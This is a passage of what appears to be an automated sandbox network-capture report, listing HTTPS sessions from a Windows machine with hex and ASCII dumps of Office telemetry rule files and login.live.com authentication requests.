                                                                                                                                            2024-10-31 16:12:59 UTC16384INData Raw: 32 22 20 49 3d 22 31 39 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e
                                                                                                                                            Data Ascii: 2" I="19" O="false" N="Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="Clean
                                                                                                                                            2024-10-31 16:12:59 UTC16384INData Raw: 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20
                                                                                                                                            Data Ascii: </L> <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R>
                                                                                                                                            2024-10-31 16:12:59 UTC16384INData Raw: 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20
                                                                                                                                            Data Ascii: > </O> </F> </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C>
                                                                                                                                            2024-10-31 16:12:59 UTC16384INData Raw: 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20
                                                                                                                                            Data Ascii: <O T="AND"> <L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" />
                                                                                                                                            2024-10-31 16:12:59 UTC16384INData Raw: 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a
                                                                                                                                            Data Ascii: <S T="2" F="HttpStatus" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" />


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            12192.168.2.44976840.126.32.133443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:12:59 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/soap+xml
                                                                                                                                            Accept: */*
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                            Content-Length: 4775
                                                                                                                                            Host: login.live.com
                                                                                                                                            2024-10-31 16:12:59 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                            2024-10-31 16:12:59 UTC568INHTTP/1.1 200 OK
                                                                                                                                            Cache-Control: no-store, no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                            Expires: Thu, 31 Oct 2024 16:11:59 GMT
                                                                                                                                            P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                            Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                            x-ms-route-info: C533_SN1
                                                                                                                                            x-ms-request-id: a8ec6cf5-979e-49a6-8f29-ab1fc0c246f3
                                                                                                                                            PPServer: PPV: 30 H: SN1PEPF00040177 V: 0
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                            Date: Thu, 31 Oct 2024 16:12:59 GMT
                                                                                                                                            Connection: close
                                                                                                                                            Content-Length: 1918
                                                                                                                                            2024-10-31 16:12:59 UTC1918INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            13192.168.2.44977313.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:00 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:00 UTC470INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:00 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 408
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                            ETag: "0x8DC582BB56D3AFB"
                                                                                                                                            x-ms-request-id: 20969678-a01e-006f-3ab0-2a13cd000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161300Z-17c5cb586f626sn8grcgm1gf8000000008b00000000028a7
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:00 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            14192.168.2.44976913.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:00 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:00 UTC584INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:00 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 3788
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                            ETag: "0x8DC582BAC2126A6"
                                                                                                                                            x-ms-request-id: 041e76a7-601e-005c-45ae-26f06f000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161300Z-16849878b78z2wx67pvzz63kdg000000088000000000x355
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:00 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            15192.168.2.44977013.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:00 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:00 UTC563INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:00 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 2980
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                            ETag: "0x8DC582BA80D96A1"
                                                                                                                                            x-ms-request-id: 834668b8-301e-0052-121c-2765d6000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161300Z-16849878b78wv88bk51myq5vxc0000000a40000000003fd8
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:00 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            16192.168.2.44977213.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:00 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:00 UTC563INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:00 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 2160
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                            ETag: "0x8DC582BA3B95D81"
                                                                                                                                            x-ms-request-id: 3be177bf-d01e-007a-546e-28f38c000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161300Z-15b8d89586flzzksdx5d6q7g100000000500000000002fq6
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:00 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            17192.168.2.44977113.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:00 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:00 UTC470INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:00 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 450
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                                                                            ETag: "0x8DC582BD4C869AE"
                                                                                                                                            x-ms-request-id: 9a0790d9-e01e-0052-7cad-26d9df000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161300Z-16849878b78fssff8btnns3b1400000009y000000000u3dc
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:00 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            18192.168.2.44977440.126.32.133443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:01 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/soap+xml
                                                                                                                                            Accept: */*
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                            Content-Length: 4775
                                                                                                                                            Host: login.live.com
                                                                                                                                            2024-10-31 16:13:01 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
